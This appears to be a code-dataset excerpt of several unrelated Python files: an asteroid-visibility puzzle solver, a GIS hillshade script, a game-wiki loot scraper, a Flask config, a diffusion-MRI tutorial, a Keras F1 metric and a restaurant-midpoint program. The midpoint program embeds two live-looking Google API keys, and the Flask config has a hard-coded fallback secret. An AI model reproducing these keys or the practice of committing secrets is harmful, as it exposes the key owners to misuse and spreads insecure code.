hexsha stringlengths 40 40 | size int64 7 1.04M | ext stringclasses 10 values | lang stringclasses 1 value | max_stars_repo_path stringlengths 4 247 | max_stars_repo_name stringlengths 4 125 | max_stars_repo_head_hexsha stringlengths 40 78 | max_stars_repo_licenses listlengths 1 10 | max_stars_count int64 1 368k ⌀ | max_stars_repo_stars_event_min_datetime stringlengths 24 24 ⌀ | max_stars_repo_stars_event_max_datetime stringlengths 24 24 ⌀ | max_issues_repo_path stringlengths 4 247 | max_issues_repo_name stringlengths 4 125 | max_issues_repo_head_hexsha stringlengths 40 78 | max_issues_repo_licenses listlengths 1 10 | max_issues_count int64 1 116k ⌀ | max_issues_repo_issues_event_min_datetime stringlengths 24 24 ⌀ | max_issues_repo_issues_event_max_datetime stringlengths 24 24 ⌀ | max_forks_repo_path stringlengths 4 247 | max_forks_repo_name stringlengths 4 125 | max_forks_repo_head_hexsha stringlengths 40 78 | max_forks_repo_licenses listlengths 1 10 | max_forks_count int64 1 105k ⌀ | max_forks_repo_forks_event_min_datetime stringlengths 24 24 ⌀ | max_forks_repo_forks_event_max_datetime stringlengths 24 24 ⌀ | content stringlengths 1 1.04M | avg_line_length float64 1.77 618k | max_line_length int64 1 1.02M | alphanum_fraction float64 0 1 | original_content stringlengths 7 1.04M | filtered:remove_function_no_docstring int64 -102 942k | filtered:remove_class_no_docstring int64 -354 977k | filtered:remove_delete_markers int64 0 60.1k |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
9a58cccdc39560a0f0636cfb1a2fb77ab4085f1c | 5,384 | py | Python | day-10/monitoring_station.py | jakipatryk/aoc-2019 | 9b08c3d2dbb0921760e9c0451ca3f5269f9268ae | [
"MIT"
] | null | null | null | day-10/monitoring_station.py | jakipatryk/aoc-2019 | 9b08c3d2dbb0921760e9c0451ca3f5269f9268ae | [
"MIT"
] | null | null | null | day-10/monitoring_station.py | jakipatryk/aoc-2019 | 9b08c3d2dbb0921760e9c0451ca3f5269f9268ae | [
"MIT"
] | null | null | null | import math
from functools import cmp_to_key
locations = """#.#................#..............#......#......
.......##..#..#....#.#.....##...#.........#.#...
.#...............#....#.##......................
......#..####.........#....#.......#..#.....#...
.....#............#......#................#.#...
....##...#.#.#.#.............#..#.#.......#.....
..#.#.........#....#..#.#.........####..........
....#...#.#...####..#..#..#.....#...............
.............#......#..........#...........#....
......#.#.........#...............#.............
..#......#..#.....##...##.....#....#.#......#...
...#.......##.........#.#..#......#........#.#..
#.............#..........#....#.#.....#.........
#......#.#................#.......#..#.#........
#..#.#.....#.....###..#.................#..#....
...............................#..........#.....
###.#.....#.....#.............#.......#....#....
.#.....#.........#.....#....#...................
........#....................#..#...............
.....#...#.##......#............#......#.....#..
..#..#..............#..#..#.##........#.........
..#.#...#.......#....##...#........#...#.#....#.
.....#.#..####...........#.##....#....#......#..
.....#..#..##...............................#...
.#....#..#......#.#............#........##...#..
.......#.....................#..#....#.....#....
#......#..###...........#.#....#......#.........
..............#..#.#...#.......#..#.#...#......#
.......#...........#.....#...#.............#.#..
..##..##.............#........#........#........
......#.............##..#.........#...#.#.#.....
#........#.........#...#.....#................#.
...#.#...........#.....#.........#......##......
..#..#...........#..........#...................
.........#..#.......................#.#.........
......#.#.#.....#...........#...............#...
......#.##...........#....#............#........
#...........##.#.#........##...........##.......
......#....#..#.......#.....#.#.......#.##......
.#....#......#..............#.......#...........
......##.#..........#..................#........
......##.##...#..#........#............#........
..#.....#.................###...#.....###.#..#..
....##...............#....#..................#..
.....#................#.#.#.......#..........#..
#........................#.##..........#....##..
.#.........#.#.#...#...#....#........#..#.......
...#..#.#......................#...............#"""
# Parse the ASCII map into a grid of characters: '#' marks an asteroid.
locations = list(map(list, locations.splitlines()))
asteroids = []
for i in range(len(locations)):
    for j in range(len(locations[i])):
        if locations[i][j] == '#':
            # Stored as (x, y): column index first, then row index.
            asteroids.append((j, i))
# NOTE(review): find_best_asteroid and find_nth_removed are not defined in
# this chunk - confirm they are defined/imported before this point.
best = find_best_asteroid(asteroids)[0]
asteroids.remove(best)
# Report the 200th asteroid removed when sweeping from the best station.
print(find_nth_removed(asteroids, best, 200))
| 37.388889 | 216 | 0.32448 | import math
from functools import cmp_to_key
def cross_product_magnitude(p, q):
    """Return the z-component (signed magnitude) of the 2-D cross product p x q."""
    return p[0] * q[1] - q[0] * p[1]
def subtract_vectors(p, q):
    """Return the displacement vector from p to q, i.e. q - p componentwise."""
    dx = q[0] - p[0]
    dy = q[1] - p[1]
    return (dx, dy)
def pseudo_distance(p, q):
    """Squared Euclidean distance between p and q (no sqrt; order-preserving)."""
    dx = q[0] - p[0]
    dy = q[1] - p[1]
    return dx * dx + dy * dy
def on_segment(p, q, r):
    """True when point p lies inside the axis-aligned bounding box of q and r."""
    x_inside = min(q[0], r[0]) <= p[0] <= max(q[0], r[0])
    y_inside = min(q[1], r[1]) <= p[1] <= max(q[1], r[1])
    return x_inside and y_inside
def find_best_asteroid(asteroids):
    """Return a (position, count) pair for the asteroid that has a direct line
    of sight to the most other asteroids.

    A candidate target is hidden when some third asteroid is colinear with the
    observer/target pair, strictly closer to the observer than the target, and
    the observer does not sit between the two (bounding-box test).
    """
    winner = (-1, -1)
    winner_count = -1
    for origin in asteroids:
        visible = 0
        for target in asteroids:
            if target == origin:
                continue
            blocked = False
            for other in asteroids:
                if other == origin or other == target:
                    continue
                to_target = subtract_vectors(origin, target)
                to_other = subtract_vectors(origin, other)
                if (cross_product_magnitude(to_target, to_other) == 0
                        and not on_segment(origin, target, other)
                        and pseudo_distance(origin, target) > pseudo_distance(origin, other)):
                    blocked = True
                    break
            if not blocked:
                visible += 1
        # Strict '>' keeps the first-encountered asteroid on ties.
        if visible > winner_count:
            winner_count = visible
            winner = origin
    return (winner, winner_count)
def sort_by_angle(asteroids, reference_point):
    """Sort asteroids by angle around reference_point, with ties on the same
    ray broken so that farther asteroids come earlier in the result.

    Uses a cmp-style comparator converted via functools.cmp_to_key.
    """
    # moves vectors to a new coordinate system where reference_point is a center
    # and rotates them by 90 deg counterclockwise
    def prepare_vectors(x, y):
        _x = subtract_vectors(reference_point, x)
        _y = subtract_vectors(reference_point, y)
        # (a, b) rotated 90 degrees counterclockwise is (-b, a)
        return ((-_x[1], _x[0]), (-_y[1], _y[0]))
    def compare_vectors(x, y):
        (_x, _y) = prepare_vectors(x, y)
        # A vector on the positive x-axis (after rotation) sorts toward the end.
        if _x[1] == 0 and _x[0] > 0:
            return 1
        elif _y[1] == 0 and _y[0] > 0:
            return -1
        # Vectors in the upper half-plane sort after those in the lower one.
        elif _x[1] > 0 and _y[1] < 0:
            return 1
        elif _x[1] < 0 and _y[1] > 0:
            return -1
        # Same half-plane: the cross product's sign gives the relative angle.
        cpm = cross_product_magnitude(_x, _y)
        if cpm != 0:
            return cpm
        # Exactly the same ray: order by distance, farther first.
        return pseudo_distance(reference_point, y) - pseudo_distance(reference_point, x)
    return sorted(asteroids, key=cmp_to_key(compare_vectors))
def find_nth_removed(asteroids, reference_point, n):
    """Return the n-th asteroid removed when sweeping around reference_point.

    NOTE(review): asteroids colinear with the current target (same ray from
    the reference point) are skipped for the current pass via the inner while,
    so each direction loses at most one asteroid per rotation - presumably
    modelling the rotating-laser rule; confirm against the puzzle spec.
    """
    # Angle-sorted copy; removal order is walked from the end of this list.
    _asteroids = sort_by_angle(asteroids, reference_point)
    i = 1  # number of asteroids removed so far (1-based)
    j = 0  # current offset from the end of the sorted list
    while i < n:
        if j == len(_asteroids):
            j = 0  # wrapped past the start: begin a new rotation
        el = _asteroids[len(_asteroids) - 1 - j]
        # Advance past neighbours lying on the same ray from the reference
        # point (cross product zero); they are blocked until the next pass.
        while cross_product_magnitude(subtract_vectors(reference_point, _asteroids[len(_asteroids) - 2 - j]), subtract_vectors(reference_point, _asteroids[len(_asteroids) - 1 - j])) == 0 and j != (len(_asteroids)-1):
            j += 1
        _asteroids.remove(el)
        i += 1
    return _asteroids[len(_asteroids) - 1 - j]
locations = """#.#................#..............#......#......
.......##..#..#....#.#.....##...#.........#.#...
.#...............#....#.##......................
......#..####.........#....#.......#..#.....#...
.....#............#......#................#.#...
....##...#.#.#.#.............#..#.#.......#.....
..#.#.........#....#..#.#.........####..........
....#...#.#...####..#..#..#.....#...............
.............#......#..........#...........#....
......#.#.........#...............#.............
..#......#..#.....##...##.....#....#.#......#...
...#.......##.........#.#..#......#........#.#..
#.............#..........#....#.#.....#.........
#......#.#................#.......#..#.#........
#..#.#.....#.....###..#.................#..#....
...............................#..........#.....
###.#.....#.....#.............#.......#....#....
.#.....#.........#.....#....#...................
........#....................#..#...............
.....#...#.##......#............#......#.....#..
..#..#..............#..#..#.##........#.........
..#.#...#.......#....##...#........#...#.#....#.
.....#.#..####...........#.##....#....#......#..
.....#..#..##...............................#...
.#....#..#......#.#............#........##...#..
.......#.....................#..#....#.....#....
#......#..###...........#.#....#......#.........
..............#..#.#...#.......#..#.#...#......#
.......#...........#.....#...#.............#.#..
..##..##.............#........#........#........
......#.............##..#.........#...#.#.#.....
#........#.........#...#.....#................#.
...#.#...........#.....#.........#......##......
..#..#...........#..........#...................
.........#..#.......................#.#.........
......#.#.#.....#...........#...............#...
......#.##...........#....#............#........
#...........##.#.#........##...........##.......
......#....#..#.......#.....#.#.......#.##......
.#....#......#..............#.......#...........
......##.#..........#..................#........
......##.##...#..#........#............#........
..#.....#.................###...#.....###.#..#..
....##...............#....#..................#..
.....#................#.#.#.......#..........#..
#........................#.##..........#....##..
.#.........#.#.#...#...#....#........#..#.......
...#..#.#......................#...............#"""
# Parse the ASCII map into a grid of characters: '#' marks an asteroid.
locations = list(map(list, locations.splitlines()))
asteroids = []
for i in range(len(locations)):
    for j in range(len(locations[i])):
        if locations[i][j] == '#':
            # Stored as (x, y): column index first, then row index.
            asteroids.append((j, i))
# Find the best monitoring station, then report the 200th asteroid removed
# when sweeping around it.
best = find_best_asteroid(asteroids)[0]
asteroids.remove(best)
print(find_nth_removed(asteroids, best, 200))
| 2,477 | 0 | 161 |
7398e9a82c0b1cc101a83ce250b039cc190777ce | 671 | py | Python | scripts/hillshade.py | alexaac/yosemite-climbing-walls | c98b8bf741c50b59b9abedb5ee16704a2958ce5c | [
"CC-BY-4.0"
] | null | null | null | scripts/hillshade.py | alexaac/yosemite-climbing-walls | c98b8bf741c50b59b9abedb5ee16704a2958ce5c | [
"CC-BY-4.0"
] | null | null | null | scripts/hillshade.py | alexaac/yosemite-climbing-walls | c98b8bf741c50b59b9abedb5ee16704a2958ce5c | [
"CC-BY-4.0"
] | null | null | null | # -*- coding: utf-8 -*-
# ---------------------------------------------------------------------------
# hillshade.py
# Created on: 2020-01-19 18:50:09.00000
# (generated by ArcGIS/ModelBuilder)
# Description:
# ---------------------------------------------------------------------------
# Import arcpy module
import arcpy
# Local variables:
# Input/output raster paths - generated empty by ModelBuilder.
# NOTE(review): fill these in before running; the tool call below will not
# work with empty strings.
yose_valley_tiles_rst05 = ""
yose_valley_rst05_hillshade = ""
# Set Geoprocessing environments
arcpy.env.scratchWorkspace = "C:\\GIS\\scratch.gdb"
arcpy.env.workspace = "C:\\GIS\\scratch.gdb"
# Process: Hillshade
# Arguments "315", "45", "NO_SHADOWS", "1" are passed straight through to the
# HillShade tool - presumably azimuth/altitude/shadows/z-factor; confirm
# against the ArcGIS HillShade documentation.
arcpy.gp.HillShade_sa(yose_valley_tiles_rst05, yose_valley_rst05_hillshade, "315", "45", "NO_SHADOWS", "1")
| 27.958333 | 107 | 0.564829 | # -*- coding: utf-8 -*-
# ---------------------------------------------------------------------------
# hillshade.py
# Created on: 2020-01-19 18:50:09.00000
# (generated by ArcGIS/ModelBuilder)
# Description:
# ---------------------------------------------------------------------------
# Import arcpy module
import arcpy
# Local variables:
# Input/output raster paths - generated empty by ModelBuilder.
# NOTE(review): fill these in before running; the tool call below will not
# work with empty strings.
yose_valley_tiles_rst05 = ""
yose_valley_rst05_hillshade = ""
# Set Geoprocessing environments
arcpy.env.scratchWorkspace = "C:\\GIS\\scratch.gdb"
arcpy.env.workspace = "C:\\GIS\\scratch.gdb"
# Process: Hillshade
# Arguments "315", "45", "NO_SHADOWS", "1" are passed straight through to the
# HillShade tool - presumably azimuth/altitude/shadows/z-factor; confirm
# against the ArcGIS HillShade documentation.
arcpy.gp.HillShade_sa(yose_valley_tiles_rst05, yose_valley_rst05_hillshade, "315", "45", "NO_SHADOWS", "1")
| 0 | 0 | 0 |
8ac1f8c53296f954f48aab6990e47cd80f08f051 | 2,176 | py | Python | sbdata/tasks.py | GregTCLTK/sbdata | c30ac933566c66ec359931a0f9a68415fb36789e | [
"BSD-3-Clause"
] | null | null | null | sbdata/tasks.py | GregTCLTK/sbdata | c30ac933566c66ec359931a0f9a68415fb36789e | [
"BSD-3-Clause"
] | null | null | null | sbdata/tasks.py | GregTCLTK/sbdata | c30ac933566c66ec359931a0f9a68415fb36789e | [
"BSD-3-Clause"
] | null | null | null | import ast
import dataclasses
import json
import re
import sys
import typing
from sbdata.repo import find_item_by_name, Item
from sbdata.task import register_task, Arguments
from sbdata.wiki import get_wiki_sources_by_title
@dataclasses.dataclass
@register_task("Fetch Dungeon Loot")
| 38.857143 | 152 | 0.560202 | import ast
import dataclasses
import json
import re
import sys
import typing
from sbdata.repo import find_item_by_name, Item
from sbdata.task import register_task, Arguments
from sbdata.wiki import get_wiki_sources_by_title
@dataclasses.dataclass
class DungeonDrop:
    """One loot-table row: an item dropped by a dungeon chest on a given floor."""
    item: Item                    # the dropped item record
    floor: int                    # Catacombs floor number (parsed from the wiki row)
    chest: str                    # chest identifier as parsed from the wiki row
    drop_chances: dict[str, str]  # chance strings keyed by identifiers like "S+A1"
    def get_drop_chance(self, has_s_plus: bool, talisman_level: int, boss_luck: int):
        """Look up the drop-chance string for a score/talisman/boss-luck combo.

        The key is built as "S", optionally "+", one letter of 'ABCD'
        (talisman_level 0-3), and a digit counting how many thresholds in
        [0, 1, 3, 5, 10] are >= boss_luck. Returns None when no matching
        chance was recorded for this drop.
        """
        drop_identifier = "S" + ('+' if has_s_plus else '') + 'ABCD'[talisman_level] + str(len([i for i in [0, 1, 3, 5, 10] if i >= boss_luck]))
        return self.drop_chances.get(drop_identifier)
@register_task("Fetch Dungeon Loot")
def fetch_dungeon_loot(args: Arguments):
    """Scrape the Catacombs loot tables from the wiki into DungeonDrop records.

    Walks the 'Dungeon Chest Table/Row' templates on the Floor I-VII loot
    master pages. Rows missing an item, floor, or chest are skipped with a
    console warning.
    """
    items = []
    for floor in get_wiki_sources_by_title(*[f'Template:Catacombs Floor {f} Loot Master' for f in ['I', 'II', 'III', 'IV', 'V', 'VI', 'VII']]).values():
        for template in floor.filter_templates():
            if template.name.strip() == 'Dungeon Chest Table/Row':
                item = None
                ifloor = None
                chest = None
                drop_chances = {}
                for param in template.params:
                    attr_name = param.name.nodes[0].strip()
                    attr_value = param.value.nodes[0].strip()
                    if attr_name == 'item':
                        # Keep the first resolution; 'customlink' may have won already.
                        if item is None:
                            item = find_item_by_name(attr_value)
                    elif attr_name == 'customlink':
                        if item is None:
                            # Value looks like "Page#Item"; the fragment holds the name.
                            item = find_item_by_name(attr_value.split('#')[-1])
                    elif attr_name == 'chest':
                        chest = attr_value
                    elif attr_name == 'floor':
                        ifloor = int(attr_value)
                    elif attr_name.startswith("S"):
                        # Drop-chance columns (e.g. "S+A1"); kept verbatim as strings.
                        drop_chances[attr_name] = attr_value
                if item is None or ifloor is None or chest is None:
                    print('WARNING: Missing data for item: ' + str(template))
                else:
                    items.append(DungeonDrop(item, ifloor, chest, drop_chances))
    return items
| 1,741 | 102 | 44 |
d16d2b5528eb5d6e162f6f01369e052c370bd458 | 940 | py | Python | app/config.py | CM2ML/plant-journey-webapp | 578ed66b43d64bafc6fe111127a06bc5f3091cbe | [
"BSD-4-Clause"
] | null | null | null | app/config.py | CM2ML/plant-journey-webapp | 578ed66b43d64bafc6fe111127a06bc5f3091cbe | [
"BSD-4-Clause"
] | 2 | 2020-06-12T13:48:15.000Z | 2020-06-14T20:48:43.000Z | app/config.py | CM2ML/plant-journey-webapp | 578ed66b43d64bafc6fe111127a06bc5f3091cbe | [
"BSD-4-Clause"
] | null | null | null | import os
# Load environmental variables from .env in development stage
basedir = os.path.abspath(os.path.dirname(__file__))
config = {
'development': DevelopmentConfig,
'testing': TestingConfig,
'staging': StagingConfig,
'production': ProductionConfig,
'default': DevelopmentConfig
} | 21.860465 | 82 | 0.768085 | import os
# Load environmental variables from .env in development stage
basedir = os.path.abspath(os.path.dirname(__file__))
class Config:
    """Base configuration shared by all environments."""
    DEBUG = False
    TESTING = False
    CSRF_ENABLED = True
    # SECURITY NOTE(review): hard-coded fallback secret - acceptable only for
    # local development; always set SECRET_KEY in the environment elsewhere.
    SECRET_KEY = os.environ.get('SECRET_KEY') or 'sdfhuethu39efgj!jfjegjh59s'
    SQLALCHEMY_RECORD_QUERIES = False
    SQLALCHEMY_TRACK_MODIFICATIONS = False
class ProductionConfig(Config):
    """Production settings: debugging off, database URI from DATABASE_URL."""
    DEBUG = False
    SQLALCHEMY_DATABASE_URI = os.environ.get('DATABASE_URL')
class StagingConfig(Config):
    """Staging settings: debugging on, database URI from DATABASE_URL."""
    DEVELOPMENT = True
    DEBUG = True
    SQLALCHEMY_DATABASE_URI = os.environ.get('DATABASE_URL')
class DevelopmentConfig(Config):
    """Local development settings: debugging on, on-disk SQLite database."""
    DEVELOPMENT = True
    DEBUG = True
    SQLALCHEMY_DATABASE_URI = 'sqlite:///' + os.path.join(basedir, 'data-dev.sqlite')
class TestingConfig(Config):
    """Test-suite settings: only flips the TESTING flag on."""
    TESTING = True
# Name -> configuration-class registry; look up by environment name
# (e.g. config['production']), with 'default' as the fallback entry.
config = {
    'development': DevelopmentConfig,
    'testing': TestingConfig,
    'staging': StagingConfig,
    'production': ProductionConfig,
    'default': DevelopmentConfig
}
f74f2e7d8c2c0a76da0b48554337c2420d8802ee | 3,269 | py | Python | doc/examples/reconst_shore_metrics.py | omarocegueda/dipy | 520b724041116a958892bee0068b057314a21cb2 | [
"MIT"
] | null | null | null | doc/examples/reconst_shore_metrics.py | omarocegueda/dipy | 520b724041116a958892bee0068b057314a21cb2 | [
"MIT"
] | null | null | null | doc/examples/reconst_shore_metrics.py | omarocegueda/dipy | 520b724041116a958892bee0068b057314a21cb2 | [
"MIT"
] | null | null | null | """
===========================
Calculate SHORE scalar maps
===========================
We show how to calculate two SHORE-based scalar maps: return to origin
probability (rtop) [Descoteaux2011]_ and mean square displacement (msd)
[Wu2007]_, [Wu2008]_ on your data. SHORE can be used with any multiple b-value
dataset like multi-shell or DSI.
First import the necessary modules:
"""
import nibabel as nib
import numpy as np
import matplotlib.pyplot as plt
from dipy.data import fetch_taiwan_ntu_dsi, read_taiwan_ntu_dsi, get_sphere
from dipy.data import get_data, dsi_voxels
from dipy.reconst.shore import ShoreModel
"""
Download and read the data for this tutorial.
"""
fetch_taiwan_ntu_dsi()
img, gtab = read_taiwan_ntu_dsi()
"""
img contains a nibabel Nifti1Image object (data) and gtab contains a GradientTable
object (gradient information e.g. b-values). For example, to read the b-values
it is possible to write print(gtab.bvals).
Load the raw diffusion data and the affine.
"""
data = img.get_data()
affine = img.affine
print('data.shape (%d, %d, %d, %d)' % data.shape)
"""
Instantiate the Model.
"""
asm = ShoreModel(gtab)
"""
Lets just use only one slice only from the data.
"""
# Use floor division: data.shape[2] / 2 yields a float in Python 3, and a
# float index raises an error when slicing the volume; // keeps it an int.
dataslice = data[30:70, 20:80, data.shape[2] // 2]
"""
Fit the signal with the model and calculate the SHORE coefficients.
"""
asmfit = asm.fit(dataslice)
"""
Calculate the analytical rtop on the signal
that corresponds to the integral of the signal.
"""
print('Calculating... rtop_signal')
rtop_signal = asmfit.rtop_signal()
"""
Now we calculate the analytical rtop on the propagator,
that corresponds to its central value.
"""
print('Calculating... rtop_pdf')
rtop_pdf = asmfit.rtop_pdf()
"""
In theory, these two measures must be equal,
to show that we calculate the mean square error on this two measures.
"""
mse = np.sum((rtop_signal - rtop_pdf) ** 2) / rtop_signal.size
print("mse = %f" % mse)
"""
mse = 0.000000
Let's calculate the analytical mean square displacement on the propagator.
"""
print('Calculating... msd')
msd = asmfit.msd()
"""
Show the maps and save them in SHORE_maps.png.
"""
fig = plt.figure(figsize=(6, 6))
ax1 = fig.add_subplot(2, 2, 1, title='rtop_signal')
ax1.set_axis_off()
ind = ax1.imshow(rtop_signal.T, interpolation='nearest', origin='lower')
plt.colorbar(ind)
ax2 = fig.add_subplot(2, 2, 2, title='rtop_pdf')
ax2.set_axis_off()
ind = ax2.imshow(rtop_pdf.T, interpolation='nearest', origin='lower')
plt.colorbar(ind)
ax3 = fig.add_subplot(2, 2, 3, title='msd')
ax3.set_axis_off()
ind = ax3.imshow(msd.T, interpolation='nearest', origin='lower', vmin=0)
plt.colorbar(ind)
plt.savefig('SHORE_maps.png')
"""
.. figure:: SHORE_maps.png
:align: center
**rtop and msd calculated using the SHORE model**.
.. [Descoteaux2011] Descoteaux M. et. al , "Multiple q-shell diffusion
propagator imaging", Medical Image Analysis, vol 15,
No. 4, p. 603-621, 2011.
.. [Wu2007] Wu Y. et. al, "Hybrid diffusion imaging", NeuroImage, vol 36,
p. 617-629, 2007.
.. [Wu2008] Wu Y. et. al, "Computation of Diffusion Function Measures
in q -Space Using Magnetic Resonance Hybrid Diffusion Imaging",
IEEE TRANSACTIONS ON MEDICAL IMAGING, vol. 27, No. 6, p. 858-865,
2008.
.. include:: ../links_names.inc
"""
| 24.954198 | 82 | 0.707862 | """
===========================
Calculate SHORE scalar maps
===========================
We show how to calculate two SHORE-based scalar maps: return to origin
probability (rtop) [Descoteaux2011]_ and mean square displacement (msd)
[Wu2007]_, [Wu2008]_ on your data. SHORE can be used with any multiple b-value
dataset like multi-shell or DSI.
First import the necessary modules:
"""
import nibabel as nib
import numpy as np
import matplotlib.pyplot as plt
from dipy.data import fetch_taiwan_ntu_dsi, read_taiwan_ntu_dsi, get_sphere
from dipy.data import get_data, dsi_voxels
from dipy.reconst.shore import ShoreModel
"""
Download and read the data for this tutorial.
"""
fetch_taiwan_ntu_dsi()
img, gtab = read_taiwan_ntu_dsi()
"""
img contains a nibabel Nifti1Image object (data) and gtab contains a GradientTable
object (gradient information e.g. b-values). For example, to read the b-values
it is possible to write print(gtab.bvals).
Load the raw diffusion data and the affine.
"""
data = img.get_data()
affine = img.affine
print('data.shape (%d, %d, %d, %d)' % data.shape)
"""
Instantiate the Model.
"""
asm = ShoreModel(gtab)
"""
Lets just use only one slice only from the data.
"""
# Use floor division: data.shape[2] / 2 yields a float in Python 3, and a
# float index raises an error when slicing the volume; // keeps it an int.
dataslice = data[30:70, 20:80, data.shape[2] // 2]
"""
Fit the signal with the model and calculate the SHORE coefficients.
"""
asmfit = asm.fit(dataslice)
"""
Calculate the analytical rtop on the signal
that corresponds to the integral of the signal.
"""
print('Calculating... rtop_signal')
rtop_signal = asmfit.rtop_signal()
"""
Now we calculate the analytical rtop on the propagator,
that corresponds to its central value.
"""
print('Calculating... rtop_pdf')
rtop_pdf = asmfit.rtop_pdf()
"""
In theory, these two measures must be equal,
to show that we calculate the mean square error on this two measures.
"""
mse = np.sum((rtop_signal - rtop_pdf) ** 2) / rtop_signal.size
print("mse = %f" % mse)
"""
mse = 0.000000
Let's calculate the analytical mean square displacement on the propagator.
"""
print('Calculating... msd')
msd = asmfit.msd()
"""
Show the maps and save them in SHORE_maps.png.
"""
fig = plt.figure(figsize=(6, 6))
ax1 = fig.add_subplot(2, 2, 1, title='rtop_signal')
ax1.set_axis_off()
ind = ax1.imshow(rtop_signal.T, interpolation='nearest', origin='lower')
plt.colorbar(ind)
ax2 = fig.add_subplot(2, 2, 2, title='rtop_pdf')
ax2.set_axis_off()
ind = ax2.imshow(rtop_pdf.T, interpolation='nearest', origin='lower')
plt.colorbar(ind)
ax3 = fig.add_subplot(2, 2, 3, title='msd')
ax3.set_axis_off()
ind = ax3.imshow(msd.T, interpolation='nearest', origin='lower', vmin=0)
plt.colorbar(ind)
plt.savefig('SHORE_maps.png')
"""
.. figure:: SHORE_maps.png
:align: center
**rtop and msd calculated using the SHORE model**.
.. [Descoteaux2011] Descoteaux M. et. al , "Multiple q-shell diffusion
propagator imaging", Medical Image Analysis, vol 15,
No. 4, p. 603-621, 2011.
.. [Wu2007] Wu Y. et. al, "Hybrid diffusion imaging", NeuroImage, vol 36,
p. 617-629, 2007.
.. [Wu2008] Wu Y. et. al, "Computation of Diffusion Function Measures
in q -Space Using Magnetic Resonance Hybrid Diffusion Imaging",
IEEE TRANSACTIONS ON MEDICAL IMAGING, vol. 27, No. 6, p. 858-865,
2008.
.. include:: ../links_names.inc
"""
| 0 | 0 | 0 |
eff1b57a9e80a69abc22628d9e510839c0e6ec22 | 1,006 | py | Python | my_metrics/metrics.py | DavidMachineLearning/CNN_traffic_sign | 6fda9ab240b5a26a4d974844fbeef24adb568af7 | [
"MIT"
] | 5 | 2019-11-26T10:59:39.000Z | 2021-05-27T22:15:16.000Z | my_metrics/metrics.py | DavidMachineLearning/CNN_traffic_sign | 6fda9ab240b5a26a4d974844fbeef24adb568af7 | [
"MIT"
] | 8 | 2020-03-22T23:11:59.000Z | 2022-03-12T00:19:53.000Z | my_metrics/metrics.py | DavidMachineLearning/CNN_traffic_sign | 6fda9ab240b5a26a4d974844fbeef24adb568af7 | [
"MIT"
] | null | null | null | from tensorflow.python.keras import backend as K
def f1_score(y_true, y_pred):
    """F1 score: the harmonic mean of precision and recall.

    Computed with the Keras backend so the metric works on symbolic tensors.
    """
    # Clip to [0, 1] and round so labels/predictions act as hard 0/1 indicators.
    true_positives = K.sum(K.round(K.clip(y_true * y_pred, 0, 1)))
    predicted_positives = K.sum(K.round(K.clip(y_pred, 0, 1)))
    possible_positives = K.sum(K.round(K.clip(y_true, 0, 1)))
    # K.epsilon() guards every division against a zero denominator.
    precision = true_positives / (predicted_positives + K.epsilon())
    recall = true_positives / (possible_positives + K.epsilon())
    return 2 * ((precision * recall) / (precision + recall + K.epsilon()))
| 38.692308 | 78 | 0.662028 | from tensorflow.python.keras import backend as K
def f1_score(y_true, y_pred):
    """F1 score metric: the harmonic mean of precision and recall."""
    def recall_metric(labels, predictions):
        """Recall metric: true positives / all actual positives."""
        # Clip/round turns labels*predictions into a hard 0/1 indicator of hits.
        true_positives = K.sum(K.round(K.clip(labels * predictions, 0, 1)))
        possible_positives = K.sum(K.round(K.clip(labels, 0, 1)))
        recall_score = true_positives / (possible_positives + K.epsilon())
        return recall_score
    def precision_metric(labels, predictions):
        """Precision metric: true positives / all predicted positives."""
        true_positives = K.sum(K.round(K.clip(labels * predictions, 0, 1)))
        predicted_positives = K.sum(K.round(K.clip(predictions, 0, 1)))
        precision_score = true_positives / (predicted_positives + K.epsilon())
        return precision_score
    precision = precision_metric(y_true, y_pred)
    recall = recall_metric(y_true, y_pred)
    # K.epsilon() is a small number used to prevent division by zero
    return 2 * ((precision * recall) / (precision + recall + K.epsilon()))
| 0 | 0 | 0 |
0755796f2e9b67c6de7865a300e0f85de7f62f78 | 107 | py | Python | veros_extra_setups/setups/wave_propagation/__init__.py | team-ocean/veros-extra-setups | cfa5c10b8b98c09cf7a64ccb3061f2af4d777214 | [
"MIT"
] | null | null | null | veros_extra_setups/setups/wave_propagation/__init__.py | team-ocean/veros-extra-setups | cfa5c10b8b98c09cf7a64ccb3061f2af4d777214 | [
"MIT"
] | 2 | 2021-08-20T11:56:47.000Z | 2022-03-31T13:56:02.000Z | veros_extra_setups/setups/wave_propagation/__init__.py | team-ocean/veros-extra-setups | cfa5c10b8b98c09cf7a64ccb3061f2af4d777214 | [
"MIT"
] | null | null | null | from veros_extra_setups.setups.wave_propagation.wave_propagation import WavePropagationSetup # noqa: F401
| 53.5 | 106 | 0.878505 | from veros_extra_setups.setups.wave_propagation.wave_propagation import WavePropagationSetup # noqa: F401
| 0 | 0 | 0 |
e8f018045c23007c1c6196fae34071650050234b | 9,084 | py | Python | middleground.py | hmushock/middle-ground | e07a17512f2c75ca9784e7e294bf3b069ad3e26a | [
"MIT"
] | 3 | 2018-03-25T17:09:15.000Z | 2020-05-27T15:34:31.000Z | middleground.py | hmushock/middle-ground | e07a17512f2c75ca9784e7e294bf3b069ad3e26a | [
"MIT"
] | null | null | null | middleground.py | hmushock/middle-ground | e07a17512f2c75ca9784e7e294bf3b069ad3e26a | [
"MIT"
] | null | null | null | """Goal: Create a program where users can input two locations and return a restaurant as equidistant as possible between them.
This will be done by connecting with the GoogleMaps Directions and Places API.
Once a suitable establishment has been found, the program will return the establishment's name, address, phone number, and hours of operation.
If a restaurant can not be found within 500 meters of the midpoint, Middle Ground will automatically expand the radius to 5000 meters."""
#!/usr/bin/env python3
import requests, json, pprint
#The requests and json modules allow me to access the JSON response from the Google APIs
#pprint allows me to return the data to the user in a format that is easier to read
DIRECTIONS_API_KEY = 'AIzaSyDmLGPIUErCNSmM-FPFSUGS9LIPFv9cbRI' #GoogleMaps Directions API Key
PLACES_API_KEY = 'AIzaSyDR_0dNH_A30KWnjz3s7GG7PZw6Vo3WkDQ' #Google Places API Key
#I do not expect a lot of people to be accessing this program on GitHub currently, so I feel comfortable leaving in the API Keys and am not worried about going over the request limit.
print('Welcome to Middle Ground.\n\nPlease use the following guidelines for the best results:')
print('\n1. Make sure the addresses are spelled completely and correctly.\nAddresses are not case-sensitive and standard postal abbreviations are acceptable.')
print('\n2. Restart the program if you have made an error while typing either address.')
print('\n3. Since Middle Ground aims to find restaurants within 500 meters of the midpoint, it is best suited for use in densely populated areas.\n')
print('*****************************************************\n\n')
restart = 1
